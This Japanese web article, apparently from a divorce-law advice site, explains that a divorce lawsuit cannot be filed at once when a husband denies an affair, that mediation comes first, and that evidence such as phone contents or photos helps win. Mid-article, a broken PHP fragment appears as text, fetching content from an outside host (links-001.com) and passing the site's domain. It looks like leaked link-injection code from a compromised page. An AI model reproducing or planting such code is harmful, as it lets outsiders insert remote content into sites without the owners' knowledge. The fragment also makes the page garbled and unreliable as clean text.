前へ
次へ

離婚裁判はすぐに起こすことができるか

夫が浮気をしていることがわかり夫に追求したもののなかなか認めないときがあるでしょう。夫の浮気に関しては一度であれば何とか許そうとする人もいるでしょうが、一度でもしたら許せないと考える人もいます。またきちんと認めて今後の話し合いに応じれば離婚を避けようとするかもしれませんが、かたくなに認めようとしないときは離婚を前提に進めていかないといけないと考えるときもあります。まずは冷静に現状を見据え手行動をとる必要があります。浮気をしている可能性が高いものの夫が浮気を認めないときはそのままでは協議離婚は難しいでしょう。慰謝料を取るのも難しく財産分与も希望通りにならない可能性もあります。早めに離婚問題に強い弁護士に間に入ってもらって離婚ができるようにしなければいけません。離婚をしたいと考えればできるだけ早く離婚が成立することを望みますが、夫が浮気を認めていない状況ですぐに離婚ができるかです。恐らくは離婚裁判での判決によらないと難しいかも知れません。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

それならと今すぐにでも離婚裁判を起こしたいところですが今の制度ではそれはできません。協議からいきなり裁判に移ることはできず、まずは離婚調停を通す必要があります。離婚調停は裁判所などに申し出て調停委員の提案の元で行う離婚になります。この提案に納得できないときにようやく裁判を行うことができ、判決によっては自分に有利な判決を出してもらえる可能性もあります。ただ調停を通さないといけないので時間がかかるのが気になるでしょう。裁判に持ち込めたとしても必ず勝てるわけではなく、勝つためには証拠が必要になります。時間がかかることを嘆くのではなく、時間があるならその間にしっかり証拠をつかむようにしましょう。どんな証拠があれば裁判に勝ちやすいかを弁護士は知っているので、そのための証拠を集めるようにします。夫の携帯電話の内容が証拠となるときもあれば、浮気をしていることがわかる写真が証拠になるときもあります。

Page Top